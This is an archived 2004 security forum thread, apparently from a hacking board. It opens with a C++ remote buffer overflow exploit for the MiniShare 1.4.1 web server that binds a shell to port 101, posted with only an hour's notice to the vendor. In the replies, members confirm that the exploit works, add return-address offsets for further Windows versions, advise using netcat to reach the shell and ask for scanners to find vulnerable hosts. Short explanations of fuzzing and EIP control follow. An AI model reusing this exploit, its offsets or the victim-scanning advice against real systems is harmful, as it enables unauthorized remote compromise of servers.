Vendors are contacted 2 hours now before you.Some security sites so. Enjoy members with my discovery
and again check my website if needed.
CODE
/*
MiniShare <= 1.4.1, Remote Buffer Overflow Exploit v0.1. Bind a shellcode to the port 101.
Full disclosure and exploit by class101 [at] DFind.kd-team.com [&] #n3ws [at] EFnet 07 november 2004
Thanx to HDMoore and Metasploit.com for their kickass ASM work.
------------------ WHAT IS MINISHARE ------------------
Homepage - http://minishare.sourceforge.net/
MiniShare is meant to serve anyone who has the need to share files to anyone, doesn't have a place to store the files on the web, and does not want or simply does not have the skill and possibility to set up and maintain a complete HTTP-server software...
-------------- VULNERABILITY --------------
A simple buffer overflow in the link length, nothing more read the code for further instructions.
---- FIX ----
Actually none, the vendor is contacted the same day published, 1 hour before you. As a nice (filtered) to NGSS , iDEFENSE and all others private disclosures homo crew ainsi que K-OTiK, ki se tap' des keu dans leur "Lab" lol :->
---- EXTRA ----
Update the JMP ESP if you need. A wrong offset will crash minishare. Code tested working on MiniShare 1.4.1 and WinXP SP1 English, Win2k SP4 English, WinNT SP6 English Others MiniShare's versions aren't tested. Tip: If it crashes for you , try to play with Sleep()...
int main(int argc,char *argv[]) { ver(); if ((argc<3)||(argc>4)||(atoi(argv[1])<1)||(atoi(argv[1])>3)){usage(argv[0]);return -1;} if (WSAStartup(MAKEWORD(2,0),&wsadata)!=0){cout<<"[+] wsastartup error: "<<WSAGetLastError()<<endl;return -1;} int ip=htonl(inet_addr(argv[2])), sz, port, sizeA, sizeB, sizeC, a, b, c; char *target, *os; if (argc==4){port=atoi(argv[3]);} else port=80; if (atoi(argv[1]) == 1){target=espxp1en;os="WinXP SP1 English";} if (atoi(argv[1]) == 2){target=esp2k4en;os="Win2k SP4 English";} if (atoi(argv[1]) == 3){target=espnt6en;os="WinNT SP6 English";} SOCKET s; struct fd_set mask; struct timeval timeout; struct sockaddr_in server; s=socket(AF_INET,SOCK_STREAM,0); if (s==INVALID_SOCKET){ cout<<"[+] socket() error: "<<WSAGetLastError()<<endl;WSACleanup();return -1;} cout<<"[+] target: "<<os<<endl; server.sin_family=AF_INET; server.sin_addr.s_addr=htonl(ip); server.sin_port=htons(port); WSAConnect(s,(struct sockaddr *)&server,sizeof(server),NULL,NULL,NULL,NULL); timeout.tv_sec=3;timeout.tv_usec=0;FD_ZERO(&mask);FD_SET(s,&mask); switch(select(s+1,NULL,&mask,NULL,&timeout)) { case -1: {cout<<"[+] select() error: "<<WSAGetLastError()<<endl;closesocket(s);return -1;} case 0: {cout<<"[+] connection failed."<<endl;closesocket(s);return -1;} default: if(FD_ISSET(s,&mask)) { cout<<"[+] connected, constructing the payload..."<<endl; Sleep(1000); sizeA=1787; sizeB=414-sizeof(scode); sizeC=10; sz=sizeA+sizeB+sizeC+sizeof(scode)+17; memset(payload,0,sizeof(payload)); strcat(payload,"GET "); for (a=0;a<sizeA;a++){strcat(payload,"\x41");} strcat(payload,target); for (b=0;b<sizeB;b++){strcat(payload,"\x41");} strcat(payload,scode); for (c=0;c<sizeC;c++){strcat(payload,"\x41");} strcat(payload," HTTP/1.1\r\n\r\n"); Sleep(1000); if (send(s,payload,strlen(payload),0)==SOCKET_ERROR) { cout<<"[+] sending error, the server prolly rebooted."<<endl;return -1;} Sleep(1000); cout<<"[+] size of payload: "<<sz<<endl; cout<<"[+] payload send, connect the port 101 to get a shell."<<endl; return 0; } } closesocket(s); WSACleanup(); return 0; }
void usage(char* us) { cout<<"USAGE: 101_mini.exe Target Ip Port\n"<<endl; cout<<"TARGETS: "<<endl; cout<<" [+] 1. WinXP SP1 English (*)"<<endl; cout<<" [+] 2. Win2k SP4 English (*)"<<endl; cout<<" [+] 3. WinNT SP6 English (*)"<<endl; cout<<"NOTE: "<<endl; cout<<" The port 80 is default if no port specified"<<endl; cout<<" The exploit bind a shellcode to the port 101"<<endl; cout<<" A wildcard (*) mean Tested."<<endl; return; }
void ver() { cout<<endl; cout<<" "<<endl; cout<<" ===================================================[v0.1]===="<<endl; cout<<" ====MiniShare, Minimal HTTP Server for Windows <= v1.4.1====="<<endl; cout<<" =============Remote Buffer Overflow Exploit=================="<<endl; cout<<" ====coded by class101===========[DFind.kd-team.com 2004]====="<<endl; cout<<" ============================================================="<<endl; cout<<" "<<endl; }
bye
Anarchiste
Nov 7 2004, 02:34 PM
Je n'ai qu'une chose à dire, chapeau l'artiste! Franchement respect pour ton boulot, peu de gens apportent autant sur la board, et je ne dis pas ça pour te lécher le cul, je dis ça parce que justement on manque de personnes actives comme toi...sur ce bonne continuation, et promis je ne le "recoderais" pas celui là
101
Nov 7 2004, 02:39 PM
QUOTE(Anarchiste @ Nov 7 2004, 02:34 PM)
Je n'ai qu'une chose à dire, chapeau l'artiste! Franchement respect pour ton boulot, peu de gens apportent autant sur la board, et je ne dis pas ça pour te lécher le cul, je dis ça parce que justement on manque de personnes actives comme toi...sur ce bonne continuation, et promis je ne le "recoderais" pas celui là
you can of course recode it I dont care but dont say coded by you without to mention the original coder as the other day, or just say at least that you modded it ,etc, this is not needed to say more than you did
or at least if you really wants to say coded by you , erase all in the code , grab your debugger and code your own.
michael
Nov 7 2004, 02:41 PM
QUOTE
payload send, connect the port 101 to get a shell
how or with what should i connect to port 101 good job on the coding m8
cyrixx
Nov 7 2004, 02:57 PM
tzzzz, try nc guy
[eXPhase
Nov 7 2004, 03:49 PM
Nice exploit again. Works here on WinXP EN SP1.
Don't gonna try this one on other boxes, since default port is 80 you have to scan ages before you can test it.
Don't gonna try this one on other boxes, since default port is 80 you have to scan ages before you can test it.
maybe a banner scan will help you
brOmstar
Nov 7 2004, 05:04 PM
thx 101 nice code
here is the jmp esp for xp sp2 german
char espxp2de[]="\x0a\xaf\xd5\x77"; //JMP ESP - user32.dll - WinXP SP2 German
i will add other german offsets soon when i'm back on my workstation...have fun
101
Nov 7 2004, 05:39 PM
QUOTE(brOmstar @ Nov 7 2004, 05:04 PM)
thx 101 nice code
here is the jmp esp for xp sp2 german
char espxp2de[]="\x0a\xaf\xd5\x77"; //JMP ESP - user32.dll - WinXP SP2 German
i will add other german offsets soon when i'm back on my workstation...have fun
thanx you , ill update my code so with your helps guys.
mortello
Nov 7 2004, 06:39 PM
Crashes Mini on my XP SP1 French....
If you could tell me how to give you the jmp esp....I would
[eXPhase
Nov 7 2004, 07:01 PM
QUOTE(Killahbee @ Nov 7 2004, 04:58 PM)
QUOTE([eXPhase @ Nov 7 2004, 03:49 PM)
Nice exploit again. Works here on WinXP EN SP1.
Don't gonna try this one on other boxes, since default port is 80 you have to scan ages before you can test it.
maybe a banner scan will help you
I couldn't find any Shixxnote a few weeks back also, and that was on port 2000. But you get tons of results on 80. And I know the banner but it is so much work for that single shell I want to see. Nah, I believe 101 it works on other versions to
mortello
Nov 7 2004, 07:16 PM
QUOTE([eXPhase @ Nov 7 2004, 07:01 PM)
QUOTE(Killahbee @ Nov 7 2004, 04:58 PM)
QUOTE([eXPhase @ Nov 7 2004, 03:49 PM)
Nice exploit again. Works here on WinXP EN SP1.
Don't gonna try this one on other boxes, since default port is 80 you have to scan ages before you can test it.
maybe a banner scan will help you
I couldn't find any Shixxnote a few weeks back also, and that was on port 2000. But you get tons of results on 80. And I know the banner but it is so much work for that single shell I want to see. Nah, I believe 101 it works on other versions to
------------------------------------------------------------------------------- 127.0.0.1 Responds with ICMP unreachable: No TCP ports: 80
TCP 80: [HTTP/1.1 200 OK Content-Type: text/html <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>]
thx goes 4 DiabloHorn 4 posting great tool called findjump
101
Nov 8 2004, 10:06 PM
so if someone know the method to get the universal jmp , if there is one , thx to tell me how to find it. thax
brOmstar
Nov 8 2004, 10:17 PM
what exactly is an universal jmp call ...does it mean that this jmp esp is the same on every system in the same dll @the same address??
101
Nov 8 2004, 10:29 PM
yes bromstar, an universal jmp adress will work on every windows, as many previous exploits, take the rpc1 for example, when HDMoore rlsed It , you can search on packetstormsecurity for my modded exploit , I have added a lot of offsets but about 1 week later it was useless because the universal offset was found.
I havent papers on how to find this , I dont care if there is an magic offset here to find for minishare but anyway Id like to learn this method , if some1 know somethign about this or have a good pâper about, thanx to post it.
brOmstar
Nov 8 2004, 10:41 PM
I know universal opcodes but not if it is in the kind I described(cause then a tool must check every osversion/lang/sp to detect that..i think-should be impossible). I read something about msfpescan at metasploit.org.
taken from http://www.metasploit.org/confs/blackhat2004/defcon.pdf -------------------------------------------------------- Msfpescan - Return Address Fun Scans PE images for data (DLL, EXE) Finds universal return addresses Easy to script, easy to parse output Regular expression match support Can automatically disassemble code
msfpescan found good returns
DCOM - NT SP6 -> XP SP1 Serv-U - All versions NT->2K3 LSASS - Autodetect Universal Blackice - Mad Bruteforce Foo -----------------------------------------------------------
so that should be a way to detect universal offsets.
3.1 Utilities The new utilities are really just the icing on the cake, and their importance is only full evident once the tools are utilized.
Msfpescan can be used to analyze and disassemble executables and DLLs, which helps to find the correct offsets and addresses during the stage of exploitation and privilege escalation. It can search for jmp statements or for a sequence like pop-pop-ret, and the utility even supports regular expressions. This can be used to find effective return addresses from Windows expressions, and thus can be used to add new targets to the exploit.
The various command line flags are as shown below,
Usage: /home/framework-2.2/msfpescan <input> <mode> <options> Inputs: -f <file> Read in PE file -d <dir> Process memdump output Modes: -j <reg> Search for jump equivalent instructions -s Search for pop+pop+ret combinations -x <regex> Search for regex match -a <address> Show code at specified virtual address Options: -A <count> Number of bytes to show after match -B <count> Number of bytes to show before match -I address Specify an alternate ImageBase -n Print disassembly of matched data
but i don't understood how to find the universal offset with that tool(at the moment).
Could it be that the jmp is in a dll that is loaded and shipped with the exploited software and is the same for every os/lang/ver ??
101
Nov 8 2004, 11:05 PM
thanx man i will read this.
Deadhat
Nov 9 2004, 11:40 AM
where do i get findjump?
ConfigSys
Nov 9 2004, 12:33 PM
tested&worked on WinxXp-SP1(english) professional work 101
simple hint because expoit work with port 80 it means we can explorer victim ip and then we can see if we got MiniShare server.
ZoraX
Nov 9 2004, 01:28 PM
nice sploit:D Just tested localy and worked 100% keep the good work up:)
alzeimeur
Nov 9 2004, 01:53 PM
nice Xploit , tested locally work perfect but I have a question, is there a scanner for this Xploit ?
thx al'
101
Nov 9 2004, 03:36 PM
thanx all for the nice answers, I found another hole in a small ftp server, check my website , Im rlsing it soon , time to advise the coder of it atm
l8r
GamezDoG
Nov 9 2004, 04:11 PM
Is there some Scanner for this exploit?? Because there are a lot of ports 80??
paskaluis
Nov 9 2004, 07:36 PM
101, thx for the code, what for a prog i need to use for debugg (jump addy) to add diffrent offsets.?
da_cash
Nov 9 2004, 08:43 PM
for all people interested here's the tool used for finding offsets in your versions..
ps ..class101 could you create any tutorial about win buffer overflows / how do you find them and what tools did You use ... it may help us gaining some more knowledge
101
Nov 9 2004, 10:47 PM
I debug a small app and simply send various strings to it , and boom !
I dont use codes to find them . just using many time ...
mortello
Nov 10 2004, 02:36 AM
QUOTE(101 @ Nov 9 2004, 10:47 PM)
I debug a small app and simply send various strings to it , and boom !
I dont use codes to find them . just using many time ...
care to explain how you "debug" a ftp server/web server or else...maybe that could help us (members here) to find some bugs also....
brOmstar
Nov 10 2004, 10:10 AM
run it in a debugger and simple send arguments...
agathos
Nov 11 2004, 03:04 PM
yea a good debugger is WinDBG running like gdb under linux or OllyDBG or softice
ShouiZen
Nov 11 2004, 07:29 PM
char espxp2fr[]="\x0A\xAF\xD5\x77"; //0x77D5AF0A -user32.dll jmp esp WIN XP SP2 french; It works fine( I tested) 101 you would do a tutorial for all members governmentsecurity thanks
DHS`
Nov 11 2004, 09:56 PM
idd @ only port 80, & banner doesn't help
DiabloPatch
Nov 12 2004, 01:23 AM
well nice those exploits but would also be nice to tell them how you learn such things. Knowledge should be for every one.
So just a very tiny quick intro to this. (since there are numorous posts on this board covering this subject.)
Finding exploits is also referred to as fuzzing. Which mean sending random length strings to a port where a service runs to see if it crashes or something odd happens. this is the easy definition to find the normal overflows. There are more powerfull fuzzing techniques to find other kind of exploits.
After finding a "exploit" in this stage rather called a bug. Now you fire up your debugger(softice or ollydbg) and start to mess around with it. The most easy explanation would be try to get "control of eip" meaning that you know exactly how many bytes to send before you start overwriting the value of eip.
at the stage where you control eip all you need to do is find out where your "payload" is and how to get there. So just finding a opcode to overwrite eip with it so that eip points to your "payload"
then you manually created a working exploit. Then after some testing etc you can just make a little C/perl program to do it all autmatically.
This was very short a little explanation on how it's done in a very basic way. for more references here are some papers.
well nice those exploits but would also be nice to tell them how you learn such things. Knowledge should be for every one.
DiabloHorn, there is no need to explain what is already perfeclty explained in tons of public papers .... I think until now I spreaded enough clear codes to be understanded .... The guys telling me to write something are just lazy themself to start to learn c, asm and exploit coding. What im not doing as the papers is the fuzzing technic wich I do manually as I already said, because im sure to find more holes via that way than to use a tool to detect them.
thats all .
bye
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
